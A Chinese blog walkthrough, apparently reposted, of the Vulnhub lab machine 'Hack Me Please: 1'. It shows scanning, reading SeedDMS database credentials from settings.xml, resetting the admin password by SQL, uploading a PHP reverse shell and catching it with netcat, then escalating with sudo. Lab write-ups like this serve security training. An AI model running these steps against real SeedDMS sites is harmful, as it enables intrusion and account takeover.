小言_互联网的博客

看完这篇 教你玩转渗透测试靶机vulnhub——Hack Me Please: 1

353人阅读  评论(0)

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是一个Web的漏洞靶机,老样子需要找到flag即可。

Vulnhub靶机下载:

官方网站:https://download.vulnhub.com/hackmeplease/Hack_Me_Please.rar

Vulnhub靶机安装:

下载好了把安装包解压 然后试用VMware即可。

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机


渗透机:kali IP :192.168.0.106 靶机IP :192.168.0.102

使用命令:nmap -sS -sV -A -n 192.168.0.102


可以看到开放了803306端口 先使用dirb扫一下 好像没有可以用的信息 继续使用dirbuster 我们可以看到有cssjs目录,里面应该还有东西没有扫描出来,我们换一个字典(默认的第五个)



可以看到js里面好像有重要文件main.js我们访问看到应该是seeddmsCMS建的网站。



②:漏洞利用

我们现在知道了CMS使用kali本地漏洞库看一下,以看到最后一个47022.txt前面写的是远程代码执行漏洞


①:要登录网站 ②:要添加一个document把木马放进去③:要看我们改的documentid
④:接上它的链接加木马去访问利用 我们才扫描过没发现登录地址,但是在main.js里面看到了路径,我们扫描那个路径看看


在使用dirb扫到了settings.xml得到了数据库账号和密码:seeddms/seeddms 然后进行登入 登入成功!!



use seeddms;
show tables;
select * from users; #查询表
select * from tblUser;
select login,pwd from  tblUsers;##查看表内容
update tblUsers set pwd=md5('123456') where login='admin'; #数据库修改密码




这里需要MD5解码 但是我这边解出来。

③:获取反弹shell:

登入成功以后发现有上传点上传一个shell.php然后添加成功后看id号,然后我们要找上传后的绝对路径在下载的seeddms框架中找到了其数据存放的目录为1048576因此对靶机该目录进行扫描使用dirsearch -u http://192.168.0.102/seeddms51x/data/1048576 -e *

PS:如果是4那么就访问/seeddms51x/data/1048576/4/shell.php 就能弹nc 这个序号是根据你上传了多少增加的,如果上传了两次就是5 可以用工具扫出来 这里我直接告诉大家了 不然到时候可能会卡住 我这边就是卡了好久 才回弹的shell(麻烦给个三联)


/usr/share/webshells/php/php-reverse-shell.php #kali自带shell
nc -lvp 1234 #和shell.php一样的端口


④:sudo提权:

先查看有哪些用户,发现了一个在mysql中见到的用户,切换saket用户
开启交换终端:python3 -c 'import pty;pty.spawn("/bin/bash")' 直接sudo -l sudo su 提权成功!




至此获取到了flag,渗透测试结束。

Vulnhub靶机渗透总结:

①.这里的知识点是知道seeddmsCMS上传后的路径:seeddms51x/data/1048576 找不i到的话就访问不了就不能nc反弹shell
②.还有就是一些基本的渗透测试扫描工具的使用:dirb,dirbuster,dirsearch
③.数据库的基本命令使用会改密码 还有sudo 提权

希望对热爱打靶机的小伙伴有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!


转载:https://blog.csdn.net/Aluxian_/article/details/128984094
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场